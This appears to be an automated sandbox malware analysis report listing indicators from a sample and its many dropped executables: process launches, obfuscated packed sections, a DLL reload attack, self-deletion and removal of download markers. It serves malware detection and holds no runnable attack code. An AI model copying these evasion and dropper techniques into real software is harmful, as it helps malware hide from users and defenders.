                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\C066.exe C:\Users\user\AppData\Local\Temp\C066.exe
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1592,3532224147046022434,3796046305070752020,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1756 /prefetch:8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1512,11815571981665026670,16401458370521835106,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1896 /prefetch:8
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess created: C:\Users\user\AppData\Local\Temp\DF3A.exe C:\Users\user\AppData\Local\Temp\DF3A.exe
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ServiceModelReg.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ServiceModelReg.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1532,13203243795606022941,14762146736583605753,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1928 /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1536,11199746608983669523,6532242252009539287,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1944 /prefetch:8
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\bhhudtb C:\Users\user\AppData\Roaming\bhhudtb
                Source: C:\Users\user\Desktop\Md0q201V1D.exeProcess created: C:\Users\user\Desktop\Md0q201V1D.exe 'C:\Users\user\Desktop\Md0q201V1D.exe'
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\21.exe C:\Users\user\AppData\Local\Temp\21.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B096.exe C:\Users\user\AppData\Local\Temp\B096.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\BBE1.exe C:\Users\user\AppData\Local\Temp\BBE1.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\CBF0.exe C:\Users\user\AppData\Local\Temp\CBF0.exe
                Source: C:\Users\user\AppData\Roaming\gbhudtbProcess created: C:\Users\user\AppData\Roaming\gbhudtb C:\Users\user\AppData\Roaming\gbhudtb
                Source: C:\Users\user\AppData\Local\Temp\21.exeProcess created: C:\Users\user\AppData\Local\Temp\21.exe C:\Users\user\AppData\Local\Temp\21.exe
                Source: C:\Users\user\AppData\Roaming\gbhudtbProcess created: C:\Users\user\AppData\Roaming\gbhudtb C:\Users\user\AppData\Roaming\gbhudtb
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=aspnet_state.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess created: C:\Users\user\AppData\Local\Temp\DF3A.exe C:\Users\user\AppData\Local\Temp\DF3A.exe
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1592,3532224147046022434,3796046305070752020,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1756 /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1512,11815571981665026670,16401458370521835106,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1896 /prefetch:8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ServiceModelReg.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation -- 'http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ServiceModelReg.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0'
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1532,13203243795606022941,14762146736583605753,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1928 /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1536,11199746608983669523,6532242252009539287,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1944 /prefetch:8
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\21.tmpJump to behavior
                Source: DF3A.exe.10.drBinary or memory string: INSERT INTO [dbo].[Details] ([Employee Id], [Title], [First Name], [Last Name], [Email], [Phone Number], [Hire Date], [Date of Birth], [Basic Pay], [House Rental Allowance], [Dearness Allowance], [Provident Fund], [Date of Leaving], [Grade]) VALUES (@Employee_Id, @Title, @First_Name, @Last_Name, @Email, @Phone_Number, @Hire_Date, @Date_of_Birth, @Basic_Pay, @House_Rental_Allowance, @Dearness_Allowance, @Provident_Fund, @Date_of_Leaving, @Grade);
                Source: sqlite3.dll.35.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: sqlite3.dll.35.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                Source: DF3A.exe.10.drBinary or memory string: UPDATE [dbo].[Details] SET [Employee Id] = @Employee_Id, [Title] = @Title, [First Name] = @First_Name, [Last Name] = @Last_Name, [Email] = @Email, [Phone Number] = @Phone_Number, [Hire Date] = @Hire_Date, [Date of Birth] = @Date_of_Birth, [Basic Pay] = @Basic_Pay, [House Rental Allowance] = @House_Rental_Allowance, [Dearness Allowance] = @Dearness_Allowance, [Provident Fund] = @Provident_Fund, [Date of Leaving] = @Date_of_Leaving, [Grade] = @Grade WHERE (([Employee Id] = @Original_Employee_Id) AND ([Title] = @Original_Title) AND ([First Name] = @Original_First_Name) AND ([Last Name] = @Original_Last_Name) AND ((@IsNull_Phone_Number = 1 AND [Phone Number] IS NULL) OR ([Phone Number] = @Original_Phone_Number)) AND ([Hire Date] = @Original_Hire_Date) AND ([Date of Birth] = @Original_Date_of_Birth) AND ([Basic Pay] = @Original_Basic_Pay) AND ((@IsNull_House_Rental_Allowance = 1 AND [House Rental Allowance] IS NULL) OR ([House Rental Allowance] = @Original_House_Rental_Allowance)) AND ((@IsNull_Dearness_Allowance = 1 AND [Dearness Allowance] IS NULL) OR ([Dearness Allowance] = @Original_Dearness_Allowance)) AND ((@IsNull_Provident_Fund = 1 AND [Provident Fund] IS NULL) OR ([Provident Fund] = @Original_Provident_Fund)) AND ((@IsNull_Date_of_Leaving = 1 AND [Date of Leaving] IS NULL) OR ([Date of Leaving] = @Original_Date_of_Leaving)) AND ([Grade] = @Original_Grade));
                Source: sqlite3.dll.35.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                Source: sqlite3.dll.35.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                Source: sqlite3.dll.35.drBinary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                Source: sqlite3.dll.35.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                Source: sqlite3.dll.35.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                Source: C:\Users\user\AppData\Local\Temp\B096.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Local\Temp\B096.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B096.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\Temp\C066.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\Temp\C066.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\AppData\Local\Temp\B096.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                Source: Md0q201V1D.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: Md0q201V1D.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: Md0q201V1D.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: Md0q201V1D.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Md0q201V1D.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: Md0q201V1D.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: Md0q201V1D.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: C:\vojos\fuw.pdb source: CBF0.exe, 0000001D.00000002.451970656.0000000000417000.00000002.00020000.sdmp, bhhudtb.10.dr
                Source: Binary string: C:\kelut\takemiv\botuw31-mejosek-li.pdb source: EBBE.exe.10.dr
                Source: Binary string: C:\pewa75 firecogiw\gugegowul49\geresegate_micicipu.pdbp source: E64F.exe.10.dr
                Source: Binary string: dC:\fudijub.pdb` source: Md0q201V1D.exe
                Source: Binary string: C:\pewa75 firecogiw\gugegowul49\geresegate_micicipu.pdb source: E64F.exe.10.dr
                Source: Binary string: C:\lewusukoviv.pdb source: C8FE.exe.10.dr
                Source: Binary string: C:\yut\pabebanejupo12 f.pdb` source: C066.exe.10.dr
                Source: Binary string: C:\fudijub.pdb source: Md0q201V1D.exe
                Source: Binary string: wntdll.pdbUGP source: CBF0.exe, 0000001D.00000002.461326417.000000006B521000.00000020.00020000.sdmp, 1105.tmp.29.dr
                Source: Binary string: wntdll.pdb source: CBF0.exe, 1105.tmp.29.dr
                Source: Binary string: WC:\kelut\takemiv\botuw31-mejosek-li.pdb` source: EBBE.exe.10.dr
                Source: Binary string: C:\tosofom\yopuk.pdb source: CAC5.exe.10.dr
                Source: Binary string: C:\lewusukoviv.pdb` source: C8FE.exe.10.dr
                Source: Binary string: C:\yut\pabebanejupo12 f.pdb source: C066.exe.10.dr
                Source: Binary string: C:\siyihoy haxuhanetaxohe\xepokupajalo99\lave.pdb` source: C295.exe.10.dr
                Source: Binary string: d:\Projects\WinRAR\SFX\build\sfxzip32\Release\sfxzip.pdb source: F11E.exe.10.dr
                Source: Binary string: C:\siyihoy haxuhanetaxohe\xepokupajalo99\lave.pdb source: C295.exe.10.dr

                Data Obfuscation:

                barindex
                Detected unpacking (changes PE section rights)Show sources
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeUnpacked PE file: 29.2.CBF0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.cipizi:R;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Local\Temp\EBBE.exeUnpacked PE file: 33.2.EBBE.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
                .NET source code contains potential unpackerShow sources
                Source: CD17.exe.10.dr, SimplePaint/FrmMain.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                Source: C:\Users\user\AppData\Local\Temp\21.exeCode function: 16_2_02D50F1A push ds; ret
                Source: C:\Users\user\AppData\Roaming\gbhudtbCode function: 23_2_02EB6552 push ds; ret
                Source: C:\Users\user\AppData\Local\Temp\B096.exeCode function: 24_2_00A2D47C push esi; iretd
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_00402E54 push eax; ret
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_00402E63 push eax; ret
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_00402665 push cs; ret
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_0040290C push eax; iretd
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_00402E16 push eax; ret
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_00402DC0 push eax; ret
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_00402DD8 push eax; ret
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_00402DE8 push eax; ret
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_00402DF1 push eax; ret
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_00402E82 push eax; ret
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_00402E85 push eax; ret
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_00402D92 push eax; ret
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_00402E95 push eax; ret
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_00401D9A pushad ; ret
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_00402E9C push eax; ret
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B59D0D1 push ecx; ret
                Source: C:\Users\user\Desktop\Md0q201V1D.exeCode function: 0_2_00426B90 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                Source: DEDC.exe.10.drStatic PE information: 0x8B87D1F5 [Mon Mar 7 03:28:53 2044 UTC]
                Source: Md0q201V1D.exeStatic PE information: section name: .pale
                Source: C066.exe.10.drStatic PE information: section name: .ruxat
                Source: 21.exe.10.drStatic PE information: section name: .pale
                Source: F1AC.exe.10.drStatic PE information: section name: Cgw(O~.
                Source: C295.exe.10.drStatic PE information: section name: .vuci
                Source: CAC5.exe.10.drStatic PE information: section name: .xoj
                Source: CBF0.exe.10.drStatic PE information: section name: .cipizi
                Source: CD17.exe.10.drStatic PE information: real checksum: 0x0 should be: 0x4147a
                Source: BBE1.exe.10.drStatic PE information: real checksum: 0x10f50 should be: 0x5be1
                Source: F11E.exe.10.drStatic PE information: real checksum: 0x0 should be: 0x114b9d
                Source: DF3A.exe.10.drStatic PE information: real checksum: 0x2bdee should be: 0x3529c
                Source: DEDC.exe.10.drStatic PE information: real checksum: 0x87179 should be: 0x81f2a
                Source: B096.exe.10.drStatic PE information: real checksum: 0x8ddc4 should be: 0x7fd66
                Source: initial sampleStatic PE information: section name: .text entropy: 6.98974133443
                Source: initial sampleStatic PE information: section name: .text entropy: 7.66210807275
                Source: initial sampleStatic PE information: section name: .text entropy: 7.66469899227
                Source: initial sampleStatic PE information: section name: .text entropy: 6.98974133443
                Source: initial sampleStatic PE information: section name: .text entropy: 7.86113394582
                Source: initial sampleStatic PE information: section name: .text entropy: 7.79620991915
                Source: initial sampleStatic PE information: section name: .text entropy: 7.83179260502
                Source: initial sampleStatic PE information: section name: .text entropy: 7.85713092672
                Source: initial sampleStatic PE information: section name: .text entropy: 7.8779018043
                Source: initial sampleStatic PE information: section name: .text entropy: 7.38549549306
                Source: initial sampleStatic PE information: section name: .text entropy: 6.97994250456
                Source: initial sampleStatic PE information: section name: .text entropy: 7.29655075024
                Source: initial sampleStatic PE information: section name: .text entropy: 7.86107035261
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\bhhudtb
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\fehudtb
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\gbhudtb
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\CBF0.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\gbhudtb
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\C066.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeFile created: C:\Users\user\AppData\Local\Temp\1105.tmpJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\BBE1.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\F11E.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\F1AC.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\C066.exeFile created: C:\Users\user\AppData\LocalLow\sqlite3.dllJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\CD17.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\C295.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\B096.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\C8FE.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\DF3A.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\DEDC.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\EBBE.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\E64F.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D8D0.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\FD36.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\21.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\CAC5.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\bhhudtb
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\fehudtb

                Hooking and other Techniques for Hiding and Protection:

                barindex
                DLL reload attack detectedShow sources
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeModule Loaded: Original DLL: C:\USERS\user\APPDATA\LOCAL\TEMP\1105.TMP reload: C:\WINDOWS\SYSWOW64\NTDLL.DLL
                Deletes itself after installationShow sources
                Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\md0q201v1d.exeJump to behavior
                Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\gbhudtb:Zone.Identifier read attributes | delete
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess information set: NOOPENFILEERRORBOX
